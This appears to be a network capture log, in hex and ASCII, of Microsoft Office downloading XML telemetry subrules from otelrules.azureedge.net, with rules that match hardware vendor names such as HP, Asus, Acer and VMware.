                                                                                                                          2024-11-25 15:43:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          40192.168.2.44980213.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:20 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:21 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 632
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                          ETag: "0x8DC582BB6E3779E"
                                                                                                                          x-ms-request-id: 5e8702c1-301e-000c-0b8f-3b323f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154321Z-174c587ffdfgcs66hC1TEB69cs00000006300000000016r1
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:21 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          41192.168.2.44980413.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:20 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:21 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 467
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                          ETag: "0x8DC582BA6C038BC"
                                                                                                                          x-ms-request-id: 4860472f-101e-0028-01d0-3e8f64000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154321Z-178bfbc474bwh9gmhC1NYCy3rs00000007u000000000524g
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:21 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          42192.168.2.44980713.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:22 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:23 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:23 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 486
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                          ETag: "0x8DC582BB344914B"
                                                                                                                          x-ms-request-id: 5fd12e2e-e01e-0051-1fc8-3e84b2000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154323Z-178bfbc474bgvl54hC1NYCsfuw00000007rg000000003m0a
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          43192.168.2.44980813.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:22 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:23 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:23 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 427
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                          ETag: "0x8DC582BA310DA18"
                                                                                                                          x-ms-request-id: b101f067-f01e-0020-26b7-3e956b000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154323Z-178bfbc474b9xljthC1NYCtw9400000007pg0000000027qz
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:23 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          44192.168.2.44980613.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:23 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:23 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:23 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 407
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                          ETag: "0x8DC582BBAD04B7B"
                                                                                                                          x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154323Z-174c587ffdfx984chC1TEB676g000000065g000000008zf3
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:23 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          45192.168.2.44980913.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:23 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:23 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:23 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 486
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                          ETag: "0x8DC582B9018290B"
                                                                                                                          x-ms-request-id: ad60cd0f-c01e-008e-6f6a-3c7381000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154323Z-174c587ffdf9xbcchC1TEBxkz400000005wg00000000tv2d
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          46192.168.2.44981013.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:23 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:23 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:23 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 407
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                          ETag: "0x8DC582B9698189B"
                                                                                                                          x-ms-request-id: 30a29eaf-701e-001e-220f-3ef5e6000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154323Z-178bfbc474bnwsh4hC1NYC2ubs00000007ug000000002z0e
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:23 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          47192.168.2.44981413.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:25 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:25 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:25 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 477
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                          ETag: "0x8DC582BB8CEAC16"
                                                                                                                          x-ms-request-id: 4834b854-301e-005d-3ab8-3ee448000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154325Z-174c587ffdf4zw2thC1TEBu340000000065g00000000mqgz
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          48192.168.2.44981213.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:25 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:25 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:25 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 469
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                          ETag: "0x8DC582BBA701121"
                                                                                                                          x-ms-request-id: d02e2b11-101e-00a2-2d3a-3c9f2e000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154325Z-178bfbc474bv7whqhC1NYC1fg400000007sg000000001vkv
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:25 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          49192.168.2.44981313.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:25 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:25 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:25 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 415
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                          ETag: "0x8DC582BA41997E3"
                                                                                                                          x-ms-request-id: ba5d631a-801e-0047-14d1-3e7265000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154325Z-178bfbc474bfw4gbhC1NYCunf400000007ng00000000gk9v
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
